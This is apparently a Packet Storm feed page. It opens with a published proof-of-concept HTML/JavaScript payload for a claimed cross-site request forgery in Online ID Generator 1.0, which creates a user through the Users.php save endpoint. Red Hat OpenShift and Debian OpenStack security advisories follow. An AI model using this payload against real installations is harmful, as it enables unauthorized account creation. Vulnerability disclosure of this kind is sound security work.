Online ID Generator version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online ID Generator 1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/id_generator/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online ID Generator 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-5749-03 - The components for Red Hat OpenShift for Windows Containers 10.16.1 are now available.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5749.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.16.1 product releaseAdvisory ID:        RHSA-2024:5749-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5749Issue date:         2024-08-22Revision:           03CVE Names:          ====================================================================Summary: The components for Red Hat OpenShift for Windows Containers 10.16.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#moderatehttps://issues.redhat.com/browse/OCPBUGS-37609

Red Hat Security Advisory 2024-5749-03

Red Hat Security Advisory 2024-5745-03 - The components for Red Hat OpenShift for Windows Containers 10.15.3 are now available.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5745.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.15.3 product release  
Advisory ID:        RHSA-2024:5745-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5745  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

The components for Red Hat OpenShift for Windows Containers 10.15.3 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/OCPBUGS-33875  
https://issues.redhat.com/browse/OCPBUGS-37533  
https://issues.redhat.com/browse/OCPBUGS-38485  
https://issues.redhat.com/browse/WINC-1289

Red Hat Security Advisory 2024-5745-03

Red Hat Security Advisory 2024-5444-03 - Red Hat OpenShift Container Platform release 4.13.48 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution and memory exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5444.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.48 bug fix and security update  
Advisory ID:        RHSA-2024:5444-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5444  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.48 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.48. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:5446

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* kernel: net:  kernel: UAF in network route management (CVE-2024-36971)  
* golang: net/http: memory exhaustion in Request.ParseMultipartForm  
(CVE-2023-45290)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)  
* openssh: Possible remote code execution due to a race condition in signal  
handling affecting Red Hat Enterprise Linux 9 (CVE-2024-6409)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://bugzilla.redhat.com/show_bug.cgi?id=2295085  
https://issues.redhat.com/browse/OCPBUGS-29124  
https://issues.redhat.com/browse/OCPBUGS-35259  
https://issues.redhat.com/browse/OCPBUGS-37119  
https://issues.redhat.com/browse/OCPBUGS-37168  
https://issues.redhat.com/browse/OCPBUGS-37421  
https://issues.redhat.com/browse/OCPBUGS-37783  
https://issues.redhat.com/browse/OCPBUGS-38295  
https://issues.redhat.com/browse/OCPBUGS-38372  
https://issues.redhat.com/browse/OCPBUGS-38403

Red Hat Security Advisory 2024-5444-03

Red Hat Security Advisory 2024-5442-03 - Red Hat OpenShift Container Platform release 4.15.28 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5442.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.15.28 packages and security update  
Advisory ID:        RHSA-2024:5442-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5442  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.28 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of  Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.15.28. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:5439

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm  
(CVE-2023-45290)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787

Red Hat Security Advisory 2024-5442-03

Red Hat Security Advisory 2024-5439-03 - Red Hat OpenShift Container Platform release 4.15.28 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5439.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.28 bug fix and security update  
Advisory ID:        RHSA-2024:5439-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5439  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.28 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.28. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:5442

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* kernel: net:  kernel: UAF in network route management (CVE-2024-36971)  
* golang: net/http: memory exhaustion in Request.ParseMultipartForm  
(CVE-2023-45290)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://issues.redhat.com/browse/OCPBUGS-24144  
https://issues.redhat.com/browse/OCPBUGS-34726  
https://issues.redhat.com/browse/OCPBUGS-34727  
https://issues.redhat.com/browse/OCPBUGS-36264  
https://issues.redhat.com/browse/OCPBUGS-37099  
https://issues.redhat.com/browse/OCPBUGS-37461  
https://issues.redhat.com/browse/OCPBUGS-37608  
https://issues.redhat.com/browse/OCPBUGS-37622  
https://issues.redhat.com/browse/OCPBUGS-37768  
https://issues.redhat.com/browse/OCPBUGS-38323

Red Hat Security Advisory 2024-5439-03

Red Hat Security Advisory 2024-5436-03 - Red Hat OpenShift Container Platform release 4.14.35 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5436.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.14.35 security update  
Advisory ID:        RHSA-2024:5436-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5436  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.35 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.14.35. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:5433

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm  
(CVE-2023-45290)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787

Red Hat Security Advisory 2024-5436-03

Red Hat Security Advisory 2024-5433-03 - Red Hat OpenShift Container Platform release 4.14.35 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and memory exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5433.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.35 security update  
Advisory ID:        RHSA-2024:5433-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5433  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.35 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.35. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:5436

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* kernel: net: UAF in network route management (CVE-2024-36971)  
* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)  
* golang: net/http: memory exhaustion in Request.ParseMultipartForm  
(CVE-2023-45290)  
* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound  
cardinality metrics (CVE-2023-47108)  
* ssh: Prefix truncation attack on Binary Packet Protocol (BPP)  
(CVE-2023-48795)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2254210  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2279476  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://issues.redhat.com/browse/OCPBUGS-30794  
https://issues.redhat.com/browse/OCPBUGS-33590  
https://issues.redhat.com/browse/OCPBUGS-36949  
https://issues.redhat.com/browse/OCPBUGS-37062  
https://issues.redhat.com/browse/OCPBUGS-37175  
https://issues.redhat.com/browse/OCPBUGS-37420  
https://issues.redhat.com/browse/OCPBUGS-37483  
https://issues.redhat.com/browse/OCPBUGS-37623  
https://issues.redhat.com/browse/OCPBUGS-37738  
https://issues.redhat.com/browse/OCPBUGS-37769  
https://issues.redhat.com/browse/OCPBUGS-37815  
https://issues.redhat.com/browse/OCPBUGS-37974  
https://issues.redhat.com/browse/OCPBUGS-38073

Red Hat Security Advisory 2024-5433-03

Debian Linux Security Advisory 5756-1 - Martin Kaesberger discovered a vulnerability which affects multiple images may result in the disclosure of arbitrary files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5756-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 21, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : novaCVE ID         : CVE-2024-32498Martin Kaesberger discovered a vulnerability which affects multipleOpenStack components (Nova, Glance and Cinder): Malformed QCOW2 diskimages may result in the disclosure of arbitrary files.For the stable distribution (bookworm), this problem has been fixed inversion 2:26.2.2-1~deb12u3.We recommend that you upgrade your nova packages.For the detailed security status of nova please refer toits security tracker page at:https://security-tracker.debian.org/tracker/novaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbFyLEACgkQEMKTtsN8TjajxRAArWI4CQrU8rgFF53jCE7u5en8TW9vW8NnVSfp2E2cBEjU6H4/JQPQ3ZEhkeBH2JR++SqwgqG06h0OAkUZYvJs1C4CkwuX8Xj18LeySueZlGKKuBjx3XBCFxWr1jJ8fGihdc1qKmTRJFIlQOxZrSC8sB6Qw3+23fHYDo1tofObmkJD1HlFx8zKdyHMwyK2sL6nDWqjHRFWp8cNQZLTKrREhdely1qpzDjd7yh01XUvoQExHAw5mGlGDHSSKvHIwrS0PM/ldc43Q12XhCoBBFvSwf11cOS5mgggFWS0KsA4Ccfte9DR6RPGlZWcubg6/Jb9PbkFYJa27Cysmi2z3JMkgR+071aa/WFwxh3VChg8sUibLFnCoMG6UKXu1gFJhkrtWQBCgcNKix4U+gk3Z+OS5g74mYeRNeFhDrsuhl1/cGTQnbNzREKl+nmmPGzeKX97od/quEgOVh9W0EOsXXo3nWguB6HCDKbE28P9+ymJFkq1Jyj1ncwri3QkQ03efPBxeLfT8hPHE8LkkGwHUolWBzqtfxKapJIQtnzG5emyUdwTKkUIOOjBH1yW4LUMRbZVoq1T7vBfsJK2XFudDPSLKM42I8u4A+ihvPjzNwhO1OrR+erLg/6g3ttLzx2pNbKvDaxkmRjAk2VY7jRPyrBJ9714JI9F3xN52aXYUNzR6P0==Zdsg-----END PGP SIGNATURE-----

Debian Security Advisory 5756-1

Debian Linux Security Advisory 5755-1 - Martin Kaesberger discovered a vulnerability which affects multiple images may result in the disclosure of arbitrary files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5755-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 21, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : glanceCVE ID         : CVE-2024-32498Martin Kaesberger discovered a vulnerability which affects multipleOpenStack components (Nova, Glance and Cinder): Malformed QCOW2 diskimages may result in the disclosure of arbitrary files.For the stable distribution (bookworm), this problem has been fixed inversion 2:25.1.0-2+deb12u1.We recommend that you upgrade your glance packages.For the detailed security status of glance please refer toits security tracker page at:https://security-tracker.debian.org/tracker/glanceFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbFyK8ACgkQEMKTtsN8Tjbtpg/+KwvaFrxrDWSY/I7oLjnaTvwZogk4GSJHtmtsyG5e6vcWMYoj88gDZfv71uzhyl8kGqyDfraD3AlyfqPbERNz1JwnS3EEHJd613Zw+4cwPbottJtvYHGhaJNdpkv1YZ6M4iJKzD33x8vTWftLXKOqMApj8se7Ip6Gr0ElroN7PXQr2T5dqZMTV4K6IdgSCZ588CmmzGzANjMUbBtcQlqAuL2ZWhkDIUY5qapuyU2M/MrzoCYV9mAN4cme79bDhkrDC5/zRV+MjdrTwiuKhR96o5jjLbYQi3jlHWG1HmLdnu3M+dcqAPbQitlwXF2DMyBDqgk6B1h+w0oV2qDApCtGxG3Vjh4AvBTQXPLJOq6NSXccwKGIGntWnlZaUPu6zwAlsBjxectHvu4t9Zy21TcXjEA/FHNZaZpSzd7b7ORXcT5+E1h+qgbmKT2RsJTKwuqe0ag8FQGC1ZhEOoaczBCzMxjUoNympLmNc5pDOLA+Ih9ZUSB2k7I+S5aMQekyIZplbIYXERJWbbjcyFra62V5LZetEUN3D6DDiUfqR5JdpqysF2n0bp9qnKmYzU8KKgaTpCZS6B2vmuespx8a23YNKk2X/UQ6xkqB6BVKFMmn1RJYgQZHZbsg2JqAuhgMliFibXBtSKm7UQOvbZVKn4fAZZL72grJtUNYdhRjuASBy+M==26RN-----END PGP SIGNATURE-----

Source

Packet Storm